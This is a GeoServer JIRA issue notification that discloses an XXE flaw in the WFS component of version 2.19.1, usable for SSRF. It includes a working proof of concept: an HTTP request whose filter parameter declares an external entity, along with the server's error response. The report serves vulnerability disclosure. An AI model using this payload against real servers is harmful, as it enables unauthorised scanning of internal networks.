[Geoserver-devel] [JIRA] (GEOS-10866) XXE in WFS component of the GeoServer version 2.19.1

say0b1 created an issue

GeoServer / BugGEOS-10866

XXE in WFS component of the GeoServer version 2.19.1

Issue Type:

BugBug

Affects Versions:

2.19.1

Assignee:

Unassigned

Components:

WFS

Created:

22/Feb/23 3:23 PM

Priority:

MediumMedium

Reporter:

say0b1

The WPS component of the GeoServer version 2.19.1 is vulnerable to an XXE, an attacker can send crafted XML files with arbitrary locations in the Filter parameter. This XXE is limited since only links pointing to an XSD file are allowed while using a DTD file was not permitted. However, this issue can still be exploited to perform SSRF attacks by scanning the local network for available hosts and open ports.

PoC:

HTTP Request:

POST /geoserver-geotec/wfs HTTP/1.1
Host: Example.com
Content-Length: 289
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Connection: close

request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@&FILTER=<%3fxml+version%3d"1.0"+encoding%3d"ISO-8859-1"%3f>+<!DOCTYPE+foo+[+<!ENTITY+xxe+SYSTEM+"http://target.com/test.xsd"+>]><Filter+><PropertyIsEqualTo><PropertyName>%26xxe%3b<Literal>Brussels</Literal></Filter>

HTTP Response:

HTTP/1.1 200 OK
Date: Mon, 20 Feb 2023 16:01:07 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 692
Connection: close
[...SNIP...]
Permissions-Policy: self
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache

<?xml version="1.0" ?>
<ServiceExceptionReport
   version="1.2.0"
   xmlns="http://www.opengis.net/ogc"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.opengis.net/ogc http://schemas.opengis.net/wfs/1.0.0/OGC-exception.xsd">
   <ServiceException code="XML getFeature request SAX parsing error" locator="org.geoserver.ows.XmlRequestReader">
      org.xml.sax.SAXParseException; systemId: http://taget.com/test.xsd; lineNumber: 1; columnNumber: 3; The content of elements must consist of well-formed character data or markup.
The content of elements must consist of well-formed character data or markup.
</ServiceException></ServiceExceptionReport>

Add Comment

Add Comment

Get Jira notifications on your phone! Download the Jira Cloud app for Android or iOS


This message was sent by Atlassian Jira (v1001.0.0-SNAPSHOT#100216-sha1:64a4cf6)

Atlassian logo